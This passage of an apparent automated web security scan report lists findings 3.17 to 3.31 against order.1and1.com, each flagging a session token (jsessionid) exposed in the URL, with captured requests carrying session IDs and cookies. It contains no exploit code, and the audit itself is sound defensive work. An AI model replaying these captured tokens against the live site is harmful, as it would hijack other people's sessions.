Location: http://order.1and1.com/xml/order/FeatureDatabaseAccess?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.17. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseDatabase

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDatabaseDatabase;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:40:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseDatabase?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.18. http://order.1and1.com/xml/order/FeatureDatabaseMssql

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseMssql

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDatabaseMssql;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:40:40 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseMssql?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.19. http://order.1and1.com/xml/order/FeatureDomainDns

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDns

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDomainDns;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:46 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainDns?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.20. http://order.1and1.com/xml/order/FeatureDomainDomains

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDomains

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDomainDomains;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:14 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainDomains?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.21. http://order.1and1.com/xml/order/FeatureDomainPdr

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainPdr

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDomainPdr;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:27 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainPdr?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.22. http://order.1and1.com/xml/order/FeatureDreamweaver

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDreamweaver

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:03 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDreamweaver?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.23. http://order.1and1.com/xml/order/FeatureEmailEmail

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailEmail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureEmailEmail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:40:55 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailEmail?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.24. http://order.1and1.com/xml/order/FeatureEmailVirusscan

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailVirusscan

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureEmailVirusscan;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:41:25 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailVirusscan?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.25. http://order.1and1.com/xml/order/FeatureEmailWebmail

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailWebmail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureEmailWebmail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:41:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailWebmail?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.26. http://order.1and1.com/xml/order/FeatureFtpBackup

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureFtpBackup

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureFtpBackup?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.27. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureGuaranteeMoneyback

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:46:18 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.28. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrCitysearch

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:44:39 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.29. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrGoogleAdWords

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:44:28 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.30. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrSesub

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureMarketingCtrSesub;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:44:54 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrSesub?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.31. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrStat

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureMarketingCtrStat;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
